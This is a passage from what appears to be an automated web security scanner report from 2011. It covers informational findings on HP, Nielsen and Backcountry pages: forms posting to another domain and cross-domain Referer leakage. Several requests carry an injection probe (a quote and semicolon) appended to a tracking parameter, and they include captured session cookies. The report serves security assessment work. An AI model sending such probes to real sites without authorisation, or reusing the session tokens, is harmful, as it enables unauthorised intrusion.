Cookie: s_vi=[CS]v1|2731D29105161EB6-600001A4C0302EDC[CE]; OV_VISTA_2009_04_09=0; hpcomsh_usen=s1=xss%20printer&s1_context=hpcomsearch&s2=xss+printer&s2_context=hhostore&s3=xss&s3_context=hpcomsearch; mbox=session#1316670895509-389686#1316672894|check#true#1316671094; s_pn=gw:us:en-us:home; s_re=ams; lang=en-us; cc=us; OAX=Mhd7ak56iIkAATNs; hpshopping=1&user_id=mlksgt%2BT3Ap7MSrqvlvccAyb0ic%3D&home_slot_1=BV704AA%23ABA%7CLP011AV%23ABA&home_slot_1_type=0%7CCTO&home_slot_1_category=0%7Cdesktops%2Fp7xt_series&home_slot_1_Affix=0%7CGS&cart_id=1603777571; _rmc_n=2; HHOJSID=LRgpT6MFm4zJCr4b99PqVpYCwCngnLth4hy6S0fnYbY2fBYN5tNm!133787182; prop12=r602; HP_EBUS=true; hpcompc_usen=cartExists=true; EMID=; s_depth=23; s_var_20=in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fesp%2Flaptops_and_mini_pcs; hp_cust_seg_sel=HHO; gpv_pN=hho%3Ags%3Alanding%3Anotebook%3Alaptops%20and%20mini%20pcs; jumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_supplies_home'%2C'1316670973931'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home4923e%2527%253B1cd62d1ca9e'%2C'1316671059055'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fpromo_tile%2F1%2Fdt_promo_tile1_budget_friendly_921'%2C'1316671280650'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping'%2C'1316671282219'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_accessories'%2C'1316672330058'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fesp%2Flaptops_and_mini_pcs'%2C'1316672333031'%5D%5D; 
ijumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_supplies_home'%2C'1316670973931'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home4923e%2527%253B1cd62d1ca9e'%2C'1316671059055'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fpromo_tile%2F1%2Fdt_promo_tile1_budget_friendly_921'%2C'1316671280652'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping'%2C'1316671282221'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_accessories'%2C'1316672330059'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fesp%2Flaptops_and_mini_pcs'%2C'1316672333032'%5D%5D; s_cc=true; HP_EBUS_HP_CLICKS=4x19x11159; s_sq=hphqglobal%2Chphqna%2Chphqhhorollup%2Chphqnahpshopping%3D%2526pid%253Dhho%25253Ags%25253Alanding%25253Acs%25253Adesktops%2526pidt%253D1%2526oid%253D%25252Fwebapp%25252Fshopping%25252Fseries_can.do_storeName%25253Dcomputer_store%252526landing%25253Ddesktops%252526a1%25253DCategory%252526v1%25253DAll-in-On_5%2526oidt%253D1%2526ot%253DA%2526oi%253D1

Response

HTTP/1.1 200 OK
Date: Thu, 22 Sep 2011 01:17:49 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_ssl/2.0.59 OpenSSL/0.9.8k
Cache-Control: private
Set-Cookie: hpcompc_usen=cartExists=true; domain=.hp.com; expires=Friday, 20-Jan-2012 01:17:50 GMT; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 168108


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html lang="en">
<head>
   <!--
...[SNIP]...
<div style="margin-bottom:-10px;margin-top:3px;margin-left:0px">
               <form name="SALES_CALLBACK" id="SALES_CALLBACK" action="https://suth.ehosts.net/NetAgent/HPCallBackLogin.aspx?ROUTEIDENT=C2C%20Series%20CAN%20Computers" method="post">
<input type="hidden" name="Prod_List" value=""/>
...[SNIP]...

6.10. http://www.shopping.hp.com/webapp/shopping/store_access.do

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.shopping.hp.com
Path:   /webapp/shopping/store_access.do

Issue detail

The page contains a form which POSTs data to the domain suth.ehosts.net. The form contains the following fields:

Request

GET /webapp/shopping/store_access.do?product_code=CN731A%23B1H&template_type=product_detail&jumpid=re_r602_dp_bg7_na_ipg_mar11_psaioA_pseaio1 HTTP/1.1
Host: www.shopping.hp.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hp.com/united-states/consumer/digital_photography/buying_guides/aio.html?jumpid=reg_R1002_USEN
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731D29105161EB6-600001A4C0302EDC[CE]; OV_VISTA_2009_04_09=0; hpcomsh_usen=s1=xss%20printer&s1_context=hpcomsearch&s2=xss+printer&s2_context=hhostore&s3=xss&s3_context=hpcomsearch; mbox=session#1316670895509-389686#1316672894|check#true#1316671094; s_pn=gw:us:en-us:home; s_re=ams; lang=en-us; cc=us; OAX=Mhd7ak56iIkAATNs; hpshopping=1&user_id=mlksgt%2BT3Ap7MSrqvlvccAyb0ic%3D&home_slot_1=BV704AA%23ABA%7CLP011AV%23ABA&home_slot_1_type=0%7CCTO&home_slot_1_category=0%7Cdesktops%2Fp7xt_series&home_slot_1_Affix=0%7CGS&cart_id=1603777571; _rmc_n=2; HHOJSID=LRgpT6MFm4zJCr4b99PqVpYCwCngnLth4hy6S0fnYbY2fBYN5tNm!133787182; HP_EBUS=true; s_var_20=in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fall-in-one_pcs; jumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home4923e%2527%253B1cd62d1ca9e'%2C'1316671059055'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fpromo_tile%2F1%2Fdt_promo_tile1_budget_friendly_921'%2C'1316671280650'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping'%2C'1316671282219'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_accessories'%2C'1316672330058'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fesp%2Flaptops_and_mini_pcs'%2C'1316672333031'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fall-in-one_pcs'%2C'1316672342102'%5D%5D; ijumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home4923e%2527%253B1cd62d1ca9e'%2C'1316671059055'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fpromo_tile%2F1%2Fdt_promo_tile1_budget_friendly_921'%2C'1316671280652'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping'%2C'1316671282221'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_accessories'%2C'1316672330059'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fesp%2Flaptops_and_mini_pcs'%2C'1316672333032'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fall-in-one_pcs'%2C'1316672342103'%5D%5D; hpcompc_usen=cartExists=true; hp_cust_seg_sel=HHO; 
gpv_pN=hho%3Ags%3Aproductadvisor%3Adesktops; prop12=r602; EMID=; s_depth=26; s_cc=true; HP_EBUS_HP_CLICKS=4x20x11244; s_sq=hphqglobal%2Chphqna%2Chphqhhomktg%2Chphqhhorollup%3D%2526pid%253Dhttp%25253A%25252F%25252Fwww.hp.com%25252Funited-states%25252Fconsumer%25252Fdigital_photography%25252Fbuying_guides%25252Faio.html%25253Fjumpid_t%25253Dreg_R1002_USEN%2526oid%253Dhttp%25253A%25252F%25252Fwww.shopping.hp.com%25252Fwebapp%25252Fshopping%25252Fstore_access.do%25253Fproduct_code%25253DCN731A%25252523B1H%252526template_type%25253Dp%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Thu, 22 Sep 2011 01:18:10 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_ssl/2.0.59 OpenSSL/0.9.8k
Cache-Control: private
Set-Cookie: hpshopping=1&user_id=mlksgt%2BT3Ap7MSrqvlvccAyb0ic%3D&home_slot_1=CN731A%23B1H%7CBV704AA%23ABA%7CLP011AV%23ABA&home_slot_1_type=0%7C0%7CCTO&home_slot_1_category=0%7C0%7Cdesktops%2Fp7xt_series&home_slot_1_Affix=0%7C0%7CGS&cart_id=1603777571; expires=Friday, 20-Jan-2012 01:18:11 GMT; path=/
Set-Cookie: hpcompc_usen=cartExists=true; domain=.hp.com; expires=Friday, 20-Jan-2012 01:18:11 GMT; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Vary: Accept-Encoding
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 222092

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<html lang="en">
<head>
<!-- hp
...[SNIP]...
<div style="margin-bottom:-10px;margin-top:3px;margin-left:0px">
               <form name="SALES_CALLBACK" id="SALES_CALLBACK" action="https://suth.ehosts.net/NetAgent/HPCallBackLogin.aspx?ROUTEIDENT=C2C%20Television%20PDP" method="post">
<input type="hidden" name="Prod_List" value=""/>
...[SNIP]...

6.11. http://www.shopping.hp.com/webapp/shopping/store_access.do

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.shopping.hp.com
Path:   /webapp/shopping/store_access.do

Issue detail

The page contains a form which POSTs data to the domain suth.ehosts.net. The form contains the following fields:

Request

GET /webapp/shopping/store_access.do?template_type=series_detail&category=desktops&series_name=p7xt_series&jumpid=in_R329_prodexp/hhoslp/psg/desktops/promo_tile/1/dt_promo_tile1_Budget_Friendly_921 HTTP/1.1
Host: www.shopping.hp.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.shopping.hp.com/desktops;HHOJSID=HWSJT6HFQjsTjvLKGJywb6ddpcRLmz2xPdythnKG2FZ6ZGygbLyp!133787182?jumpid=in_R329_prodexp/hhoslp/psg/lateralnav_desktops_home4923e'%3b1cd62d1ca9e
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731D29105161EB6-600001A4C0302EDC[CE]; HHOJSID=HWSJT6HFQjsTjvLKGJywb6ddpcRLmz2xPdythnKG2FZ6ZGygbLyp!133787182; OV_VISTA_2009_04_09=0; hpcomsh_usen=s1=xss%20printer&s1_context=hpcomsearch&s2=xss+printer&s2_context=hhostore&s3=xss&s3_context=hpcomsearch; mbox=session#1316670895509-389686#1316672894|check#true#1316671094; s_pn=gw:us:en-us:home; s_re=ams; hpshopping=1&user_id=mlkqgtqf2Qt7MiHjv1bYeQeXlmvi; hpcompc_usen=cartExists=false; s_var_20=in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home4923e'%3B1cd62d1ca9e; hp_cust_seg_sel=HHO; gpv_pN=no%20value; jumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home'%2C'1316670949238'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_tablet_home'%2C'1316670953100'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_services_home'%2C'1316670961899'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_printers_home'%2C'1316670966980'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_supplies_home'%2C'1316670973931'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home4923e%2527%253B1cd62d1ca9e'%2C'1316671059055'%5D%5D; ijumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home'%2C'1316670949239'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_tablet_home'%2C'1316670953101'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_services_home'%2C'1316670961900'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_printers_home'%2C'1316670966980'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_supplies_home'%2C'1316670973931'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home4923e%2527%253B1cd62d1ca9e'%2C'1316671059055'%5D%5D; lang=en-us; cc=us; prop12=r602; EMID=; s_depth=14; s_cc=true; _rmc_n=1; OAX=Mhd7ak56iIkAATNs; HP_EBUS_HP_CLICKS=4x12x2345; 
s_sq=hphqglobal%2Chphqna%2Chphqhhorollup%2Chphqnahpshopping%3D%2526pid%253Dhttp%25253A%25252F%25252Fwww.shopping.hp.com%25252Fdesktops%25253BHHOJSID%25253DHWSJT6HFQjsTjvLKGJywb6ddpcRLmz2xPdythnKG2FZ6ZGygbLyp!133787182%25253Fjumpid_t%25253Din_R329_prodexp%25252Fhhoslp%25252Fpsg%25252Flateralnav_desktops_home4923e'%2525253b1cd62d1ca9e%2526oid%253D%25252Fwebapp%25252Fshopping%25252Fstore_access.do_template_type%25253Dseries_detail%252526category%25253Ddesktops%252526series_name%25253Dp7xt_s_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1%26hphqhhomktg%3D%2526pid%253Dhho%25257CEC%25257Cus%25257Cen%25257CFlash%252520%25253A%252520Main%252520%25253A%252520%252520Whats%252520hot%252520%25253A%252520Feature%2525201%252520%25253A%252520HP%252520Coolsense%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fh71036.www7.hp.com%25252Fhho%25252Fus%25252Fen%25252Fpclc%25252Farticles%25252Fcoolsense-technology.html%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Thu, 22 Sep 2011 01:00:03 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_ssl/2.0.59 OpenSSL/0.9.8k
Cache-Control: private
Set-Cookie: hpshopping=1&user_id=mlkjg92V0Q14NS%2FivlvfcASe0ic%3D&home_slot_1=LP011AV%23ABA&home_slot_1_type=CTO&home_slot_1_category=desktops%2Fp7xt_series&home_slot_1_Affix=GS; expires=Friday, 20-Jan-2012 01:00:03 GMT; path=/
Set-Cookie: hpcompc_usen=cartExists=false; domain=.hp.com; expires=Friday, 20-Jan-2012 01:00:03 GMT; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 241316


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html lang="en">
<head>
   <!--
...[SNIP]...
<div style="margin-bottom:-10px;margin-top:3px;margin-left:0px">
               <form name="SALES_CALLBACK" id="SALES_CALLBACK" action="https://suth.ehosts.net/NetAgent/HPCallBackLogin.aspx?ROUTEIDENT=C2C%20Series%20Detail%20Computers" method="post">
<input type="hidden" name="Prod_List" value=""/>
...[SNIP]...

7. Cross-domain Referer leakage
There are 18 instances of this issue:

Issue background

When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.

If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.

You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.

Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.

Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.

Issue remediation

The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.


7.1. http://nielsen.com/content/corporate/us/en/search.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://nielsen.com
Path:   /content/corporate/us/en/search.html

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /content/corporate/us/en/search.html?q=mobile+tv+internet HTTP/1.1
Host: nielsen.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://nielsen.com/us/en/practices/cross-platform-audience-behavior.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=221383559.465396599.1316711871.1316711871.1316711871.1; __utmb=221383559.3.10.1316711871; __utmc=221383559; __utmz=221383559.1316711871.1.1.utmcsr=nielsen-online.com|utmccn=(referral)|utmcmd=referral|utmcct=/intlpage.html; SessionPersistence=CLICKSTREAMCLOUD%3A%3DvisitorId%3Danonymous%7CPROFILEDATA%3A%3Davatar%3D%2Fetc%2Fdesigns%2Fdefault%2Fimages%2Fcollab%2Favatar.png%2CauthorizableId%3Danonymous%2CauthorizableId_xss%3Danonymous%2CformattedName%3D%2CformattedName_xss%3D%7CSURFERINFO%3A%3DIP%3D127.0.0.1%2Ckeywords%3D%2Cbrowser%3DChrome%2COS%3DWindows%2Cresolution%3D1920x1200%7C; Nielsen.com-cookie=R3976301559

Response

HTTP/1.1 200 OK
Set-Cookie: Nielsen.com-cookie=R3937166166; path=/; expires=Thu, 22-Sep-2011 17:57:05 GMT
Date: Thu, 22 Sep 2011 12:17:11 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8b Communique/4.0.8
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Content-Length: 49920

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>


<meta http-equiv="content-type" content="text/html; charset=UTF-8"
...[SNIP]...
<div align="center"><a href="http://www.linkedin.com/companies/the-nielsen-company" target="_blank"><img src="/content/dam/corporate/shared/images/icons/misc_icons/linkedin.gif" width="32" height="32" alt="Find us on LinkedIn">
...[SNIP]...
<div align="center"><a href="http://www.facebook.com/nielsencompany" target="_blank"><img src="/content/dam/corporate/shared/images/icons/misc_icons/facebook.gif" width="32" height="32" alt="Find us on Facebook">
...[SNIP]...
<div align="center"><a href="http://twitter.com/nielsenwire/" target="_blank"><img src="/content/dam/corporate/shared/images/icons/misc_icons/twit.gif" width="32" height="32" alt="Follow us on Twitter">
...[SNIP]...
<div id="menu4" class="menu" >


<a href="http://www.nielsenwire.com" onclick="clickEvent('tabLink4', 'false');" target="new">
Nielsen Wire
</a>
...[SNIP]...
<li class="manualLinks">
<a href='http://huff.to/q3n3dA' target='_blank'>Facebook More Popular Than Any Other Website--By A Lot: Nielsen (Huffington Post)</a>
...[SNIP]...
<li class="manualLinks">
<a href='http://bit.ly/q16DiG' target='_blank'>Obama&#039;s Jobs Plan Speech Garners Large TV Audience (International Business Times)</a>
...[SNIP]...
<li class="manualLinks">
<a href='http://smrt.io/q5RzLb' target='_blank'>Water concerns trump global warming worries&#44; Nielsen says (SmartPlanet)</a>
...[SNIP]...
<li class="manualLinks">
<a href='http://bit.ly/qcUsP9' target='_blank'>Indians prefer eco-friendly products (Business Standard)</a>
...[SNIP]...
<li class="manualLinks">
<a href='http://bit.ly/qYUDBv' target='_blank'>Climate change concern tumbles in US and China (Guardian)</a>
...[SNIP]...
<li class="manualLinks">
<a href='http://bloom.bg/n5cOxO' target='_blank'>Why Are India&#039;s Women So Stressed Out? (Bloomberg)</a>
...[SNIP]...
<div>
<img src="//secure-us.imrworldwide.com/cgi-bin/m?ci=us-nielsen&amp;cg=com&amp;cc=1&amp;ts=noscript" width="1" height="1" alt=""/>
</div>
...[SNIP]...

7.2. http://nielsen.com/us/en/practices/cross-platform-audience-behavior.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://nielsen.com
Path:   /us/en/practices/cross-platform-audience-behavior.html

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /us/en/practices/cross-platform-audience-behavior.html?q=mobile+tv+internet HTTP/1.1
Host: nielsen.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://nielsen.com/us/en/practices/cross-platform-audience-behavior.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=221383559.465396599.1316711871.1316711871.1316711871.1; __utmb=221383559.3.10.1316711871; __utmc=221383559; __utmz=221383559.1316711871.1.1.utmcsr=nielsen-online.com|utmccn=(referral)|utmcmd=referral|utmcct=/intlpage.html; SessionPersistence=CLICKSTREAMCLOUD%3A%3DvisitorId%3Danonymous%7CPROFILEDATA%3A%3Davatar%3D%2Fetc%2Fdesigns%2Fdefault%2Fimages%2Fcollab%2Favatar.png%2CauthorizableId%3Danonymous%2CauthorizableId_xss%3Danonymous%2CformattedName%3D%2CformattedName_xss%3D%7CSURFERINFO%3A%3DIP%3D127.0.0.1%2Ckeywords%3D%2Cbrowser%3DChrome%2COS%3DWindows%2Cresolution%3D1920x1200%7C; Nielsen.com-cookie=R3976301559

Response

HTTP/1.1 200 OK
Set-Cookie: Nielsen.com-cookie=R3976301559; path=/; expires=Thu, 22-Sep-2011 17:57:05 GMT
Date: Thu, 22 Sep 2011 12:17:11 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8b Communique/4.0.8
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Content-Length: 50464

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>


<meta http-equiv="content-type" content="text/html; charset=UTF-8"
...[SNIP]...
<div align="center"><a href="http://www.linkedin.com/companies/the-nielsen-company" target="_blank"><img src="/content/dam/corporate/shared/images/icons/misc_icons/linkedin.gif" width="32" height="32" alt="Find us on LinkedIn">
...[SNIP]...
<div align="center"><a href="http://www.facebook.com/nielsencompany" target="_blank"><img src="/content/dam/corporate/shared/images/icons/misc_icons/facebook.gif" width="32" height="32" alt="Find us on Facebook">
...[SNIP]...
<div align="center"><a href="http://twitter.com/nielsenwire/" target="_blank"><img src="/content/dam/corporate/shared/images/icons/misc_icons/twit.gif" width="32" height="32" alt="Follow us on Twitter">
...[SNIP]...
<div id="menu4" class="menu" >


<a href="http://www.nielsenwire.com" onclick="clickEvent('tabLink4', 'false');" target="new">
Nielsen Wire
</a>
...[SNIP]...
<li class="manualLinks">
<a href='http://huff.to/q3n3dA' target='_blank'>Facebook More Popular Than Any Other Website--By A Lot: Nielsen (Huffington Post)</a>
...[SNIP]...
<li class="manualLinks">
<a href='http://bit.ly/q16DiG' target='_blank'>Obama&#039;s Jobs Plan Speech Garners Large TV Audience (International Business Times)</a>
...[SNIP]...
<li class="manualLinks">
<a href='http://smrt.io/q5RzLb' target='_blank'>Water concerns trump global warming worries&#44; Nielsen says (SmartPlanet)</a>
...[SNIP]...
<li class="manualLinks">
<a href='http://bit.ly/qcUsP9' target='_blank'>Indians prefer eco-friendly products (Business Standard)</a>
...[SNIP]...
<li class="manualLinks">
<a href='http://bit.ly/qYUDBv' target='_blank'>Climate change concern tumbles in US and China (Guardian)</a>
...[SNIP]...
<li class="manualLinks">
<a href='http://bloom.bg/n5cOxO' target='_blank'>Why Are India&#039;s Women So Stressed Out? (Bloomberg)</a>
...[SNIP]...
<div>
<img src="//secure-us.imrworldwide.com/cgi-bin/m?ci=us-nielsen&amp;cg=com&amp;cc=1&amp;ts=noscript" width="1" height="1" alt=""/>
</div>
...[SNIP]...

7.3. http://www.backcountry.com/store/cart/add.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.backcountry.com
Path:   /store/cart/add.html

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /store/cart/add.html?item_code=BCS0021&mv_order_group=1&mv_todo=refresh&mv_form_profile=option_check&mv_session_id=&mv_order_cat_id=&mv_order_subcat_id=&mv_order_pg_id=&mv_order_catalog_id=&mv_order_is_gift_box=0&is_package=0&is_giftcert=1&mv_javascript=1&mv_sku=BCS0021-BCSGC125-ONSI&sku_options=1&mv_order_swatch_position=&mv_order_quantity=1&x=55&y=10 HTTP/1.1
Host: www.backcountry.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.backcountry.com/backcountry-gift-certificate-bcs0021
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _msuuid_w4kr1ll1r0=2ABAD7B1-7D08-4A54-B5F7-5E536E68E075; s_cpm=%5B%5B%27Direct%2520Load%27%2C%271316711542269%27%5D%5D; s_vi=[CS]v1|273D92EC05013BC2-40000109E026E9CB[CE]; rdv_test_group=1; RES_TRACKINGID=841292264887481; CART=; MV_SESSION_ID=TUtKhM3y:nobody:plata:ab0ee0ab; siec=true; affiliate_reference_id=R999; __utmx=248652180.; __utmxx=248652180.; s_cc=true; mr_referredVisitor=0; __utma=248652180.1694759348.1316711586.1316711586.1316711586.1; __utmb=248652180.1.10.1316711586; __utmc=248652180; __utmz=248652180.1316711586.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mt.v=1.346469883.1316711542790; utag=session_id:1316711948944$_session:1316713387819; __ar_v4=; c49=PDP%3ABackcountry.com%20Gift%20Certificate; s_sq=bcbackcountry%3D%2526pid%253DPDP%25253ABackcountry.com%252520Gift%252520Certificate%2526pidt%253D1%2526oid%253Dhttp%25253A//content.backcountry.com/images/bcs/product_detail/add_to_cart.gif%2526ot%253DIMAGE

Response

HTTP/1.1 200 OK
Server: Apache
X-Session-Path: Long id in cookie
X-Session-Checked: 1
P3P: CP="IND NON DSP PHY ONL UNI FIN PUR COM INT DEM CNT STA PRE POL CUR ADMa PSAo PSDo IVAo IVDo CONo OUR", policyref="http://www.backcountry.com/w3c/p3p.xml"
Cache-Control: s-maxage=3600
Edge-Cache: max-age=3600
X-HandledBy: evans
Content-Length: 29511
Content-Type: text/html; charset=iso-8859-1
Date: Thu, 22 Sep 2011 12:11:53 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: MV_SESSION_ID=TUtKhM3y:nobody:plata:ab0ee0ab; path=/; expires=Sun, 19-Sep-2021 12:11:53 GMT
Set-Cookie: CART=; path=/; expires=Sun, 19-Sep-2021 12:11:53 GMT
Set-Cookie: siec=true; path=/; expires=Tue, 21-Sep-2021 22:11:53 GMT
Set-Cookie: affiliate_reference_id=R999; path=/; expires=Tue, 21-Sep-2021 22:11:53 GMT
Set-Cookie: omn_cookie=; path=/; expires=Thu, 01-Jan-1970 00:00:12 GMT
Set-Cookie: tr_template=; path=/; expires=Fri, 23-Sep-2011 12:11:53 GMT
Set-Cookie: cart_cross_sell=; path=/; expires=Thu, 01-Jan-1970 00:00:12 GMT
Set-Cookie: saw_content_upload=; path=/; expires=Thu, 01-Jan-1970 00:00:12 GMT
Set-Cookie: saw_poos=; path=/; expires=Thu, 01-Jan-1970 00:00:12 GMT
Set-Cookie: saw_order_detail=; path=/; expires=Thu, 01-Jan-1970 00:00:12 GMT
Set-Cookie: promo_nav=; path=/; expires=Sun, 19-Sep-2021 12:11:53 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphp
...[SNIP]...
